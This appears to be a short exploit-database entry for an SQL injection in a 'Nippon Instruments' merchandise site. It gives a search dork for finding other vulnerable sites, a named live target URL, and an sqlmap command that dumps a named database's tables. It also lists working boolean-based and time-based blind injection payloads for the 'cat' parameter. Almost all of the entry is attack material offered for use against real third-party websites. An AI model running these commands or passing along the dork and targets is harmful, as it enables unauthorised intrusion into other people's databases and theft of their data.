# Exploit Title:Nippon Instruments SQL Injection
# Date:18.05.2019
# Dork :intext:"© Copyright 2011 Silentium Designs" id=
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux
#Demo
http://hg-nic.us/merchandise/index.php?cat=19
# Poc:
sqlmap -u "http://hg-nic.us/merchandise/index.php?cat=19" --random-agent -D hgnicus_gkgwcm --tables
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=19 AND 6170=6170
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=19 AND SLEEP(5)
---